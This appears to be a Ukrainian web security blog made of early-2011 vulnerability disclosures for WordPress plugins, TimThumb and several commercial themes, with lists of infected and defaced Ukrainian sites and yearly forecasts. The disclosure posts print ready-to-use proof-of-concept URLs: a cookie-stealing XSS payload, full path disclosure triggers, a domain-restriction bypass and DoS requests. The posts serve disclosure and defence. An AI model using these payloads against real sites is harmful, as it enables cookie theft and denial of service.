Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Universal Post Manager та WP-StarsRateBox. Для котрих з’явилися експлоіти. Universal Post Manager - це плагін для створення голосуваннь та багатьох інших функцій на сайті на WP, WP-StarsRateBox - це плагін для створення рейтингу сторінок.

• Multiple SQL Injection in Universal Post Manager wordpress plugin (деталі)
• SQL Injection in WP-StarsRateBox wordpress plugin (деталі)
• Multiple XSS in WP-StarsRateBox wordpress plugin (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://kivadm.gov.ua - інфікований державний сайт - інфекція була виявлена 08.04.2011. Зараз сайт не входить до переліку підозрілих.
• http://man.gov.ua - інфікований державний сайт - інфекція була виявлена 02.04.2011. Зараз сайт не входить до переліку підозрілих.
• http://pryvitannya.at.ua - інфекція була виявлена 07.02.2011. Зараз сайт не входить до переліку підозрілих.
• http://play-games.at.ua - інфекція була виявлена 04.03.2011. Зараз сайт не входить до переліку підозрілих.
• http://psybot.pp.net.ua - інфекція була виявлена 05.03.2011. Зараз сайт не входить до переліку підозрілих.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.malyn-rada.gov.ua (хакером MCA-CRB) - взломаний державний сайт
• http://www.invest.gov.ua (хакерами з Ashiyane Digital Security Team) - 11.04.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
• http://www.fonts2u.com (хакером ke$ha)
• http://maluk.in.ua (хакером Seif Jelidi) - 09.04.2011, зараз сайт вже виправлений адмінами
• http://www.ladiestime.com.ua (хакером SkyNet)

Продовжуючи тему редиректорів в CMS пропоную вам нову добірку редиректорів.

В даних записах я наводжу приклади редиректорів в різних CMS (та інших веб додатках). Дані уразливості можна виявити майже на всіх сайтах, що використовують зазначені системи.

Редиректори в CMS движках:

Pligg Content Management System:

• http://site/out.php?link=http://websecurity.com.ua

Вразливі лише старі версії Pligg CMS.

vBulletin (vbAnonymizer для vBulletin):

• http://domaintimes.net/forum/…?url=http://websecurity.com.ua

CMS WebManager-Pro:

• http://www.skypatrol.com.ua/…url=http://websecurity.com.ua

08.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі Mimbo Pro для WordPress. Це комерційний шаблон для WP. Ця тема розроблена автором TimThumb, який і використовується в ній. Уразливості я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темах Live Wire 2.0 та Live Wire Style для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

14.04.2011

XSS:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/mimbopro/

А також ще десятки php-скриптів шаблону в папці /mimbopro/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Уразливі Mimbo Pro 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив майже всі уразливості.

07.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в TimThumb. Це веб додаток що використовується в темах для WordPress. А по суті дані уразливості я виявив ще 08.12.2008, коли я вперше стикнуся з thumb.php. Про що найближчим часом повідомлю розробникам.

Уразливими є TimThumb та всі веб додатки (зокрема теми для WordPress), що його використовують. Це такі шаблони як Live Wire Edition, The Gazette Edition, Live Wire 2.0 та Live Wire Style.

А також наступні комерційні шаблони: Bookclub, Fresh News, BoldNews, Placeholder, Biznizz, Auld, Listings, Elefolio, Chapters, Continuum, Diner, Skeptical, Caffeinated, Crisp, Sealight, Unite, Estate, The Morning After, Coda, Inspire, Apz, Spectrum, Diarise, Boast, Retreat, City Guide, Cinch, Slanted, Canvas, Postcard, Delegate, MyStream, Optimize, Backstage, SophisticatedFolio, Bueno, Digital Farm, Headlines, f0101, Royalle, Exposure, Therapy, Rockstar, Daily Edition, Object, Antisocial, Coffee Break, Mortar, Big Easy, Mainstream, Groovy Photo, Groovy Blog, Feature Pitch, Suit and Tie, The Journal, myweblog, Aperture, Meta-Morphosis, Bloggingstream, The Station, Groovy Video, Productum, Newsport, Irresistible, Cushy, WooTube, Foreword Thinking, Geometric, Abstract, Busy Bee, BlogTheme, Gotham News, THiCK, Typebased, Over Easy, Ambience, Snapshot, Open Air, Fresh Folio, Papercut, ProudFolio, VibrantCMS, Flash News, NewsPress, The Original Premium News та інші шаблони для WP. Уразливості в даних шаблонах аналогічні діркам в вищеназваних шаблонах.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

13.04.2011

Веб додаток може розміщуватися в файлі thumb.php або timthumb.php.

XSS:

http://site/path/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure:

http://site/path/thumb.php?src=http://
http://site/path/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/path/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality:

http://site/path/thumb.php?src=http://site&h=1&w=1
http://site/path/thumb.php?src=http://site.google.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS:

http://site/path/thumb.php?src=http://site/big_file&h=1&w=1

Уразливі TimThumb 1.24 та попередні версії (та теми для WP з цими версіями). XSS можлива лише в старих версіях програми. В версіях до 1.22 можлива AoF навіть з включеним обмеженням на домени через використання обхідної техніки. Також можна проводити DoS атаки, коли великий файл розміщенний на тому самому сайті, що і php-скрипт, або на дозволеному домені. Або якщо в скрипті дозволені зовнішні сайти, то тоді можна проводити AoF та DoS атаки. В версії TimThumb 1.25 уразливості переважно виправлені.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://umvs-kherson.gov.ua - інфікований державний сайт - інфекція була виявлена 03.04.2011. Зараз сайт входить до переліку підозрілих.
• http://ivaadm.gov.ua - інфікований державний сайт - інфекція була виявлена 18.03.2011. Зараз сайт не входить до переліку підозрілих.
• http://ironmensport.com - інфекція була виявлена 21.03.2011. Зараз сайт входить до переліку підозрілих.
• http://nano.com.ua - інфекція була виявлена 02.04.2011. Зараз сайт не входить до переліку підозрілих.
• http://dorama-teens.at.ua - інфекція була виявлена 26.02.2011. Зараз сайт не входить до переліку підозрілих.

05.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темах Live Wire 2.0 та Live Wire Style для WordPress. Це ще дві теми, що разом з Live Wire Edition входять до серії Live Wire. І вони також є комерційними шаблонами для WP від WooThemes. Які я виявив на одному сайті, що їх використовує. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темі The Gazette Edition для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам тем.

12.04.2011

XSS:

http://site/wp-content/themes/livewire/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure:

http://site/wp-content/themes/livewire/thumb.php?src=jpg
http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/livewire/

А також ще 30 php-скриптів шаблону в папці /livewire/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/livewire/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/livewire/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /livewire/, дані теми також можуть розміщуватися в папках /livewire-dev/ та /livewire-package/ (це пакет, що включає всі три теми Live Wire серії).

Уразливі Live Wire 2.0 та Live Wire Style версія 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблонів. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.

Як і в попередні роки, надам свої прогнози розвитку веб безпеки в новому році. Але спочатку зроблю огляд тих прогнозів, що я давав на 2010 рік.

На початку минулого року я зробив свої прогнози стосовно розвитку галузі веб безпеки в минулому році. І зараз я оціню наскільки справдилися мої попередні прогнози.

1. Уразливості XSS в минулому році, як і раніше, все більше поширювалися (вони були найпоширенішими уразливостями веб додатків).
2. Збільшилися випадки витоків важливої інформації.
3. Активно знаходилися та використовувалися уразливості в браузерах для атак на користувачів.
4. Фішинги атаки проводилися достатньо активно на протязі минулого року. Що спонукало популярні сервіси почати більш наполегливо боротися проти фішінга та розповсюдження malware.
5. Значно зросла кількість заражених вірусами веб сторінок в Інтернеті. Зокрема в Уанеті в 2009 я виявив 65 інфікованих сайтів, а в 2010 вже 264 сайти (зростання на 294%).
6. Збільшилися атаки на соціальні мережі, в тому числі на Facebook та Twitter.
7. Значно зросла хакерська активність (зокрема в Уанеті зростання на 460%).

Як видно всі мої попередні прогнози переважно збулися .

А тепер мій прогноз розвитку галузі веб безпеки в 2011 році.

1. Уразливості XSS будуть поширюватися й надалі.
2. Все більше будуть використовуватися уразливості в браузерах та плагінах для атак на користувачів.
3. Збільшиться кількість атак на державні сайти України.
4. Розробники браузерів почнуть більш активно впроваджувати секюріті механізми в свої продукти.
5. Зростання кількості заражених вірусами веб сторінок буде більш активним.
6. Атаки на соціальні мережі продовжать збільшуватися.
7. Продовжиться подальше зростання хакерської активності.

03.02.2011

Учора, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі The Gazette Edition для WordPress. Це комерційний шаблон для WP від WooThemes. Які я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темі Live Wire Edition для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

11.04.2011

XSS:

http://site/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure:

http://site/wp-content/themes/gazette/thumb.php?src=http://site
http://site/wp-content/themes/gazette/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/gazette/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/gazette/

А також ще десятки php-скриптів шаблону в папці /gazette/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/gazette/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /gazette/ в каталозі з темами, дана тема також може розміщуватися в папці /gazette-dev/gazette/.

Уразливі The Gazette Edition 2.9.4 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.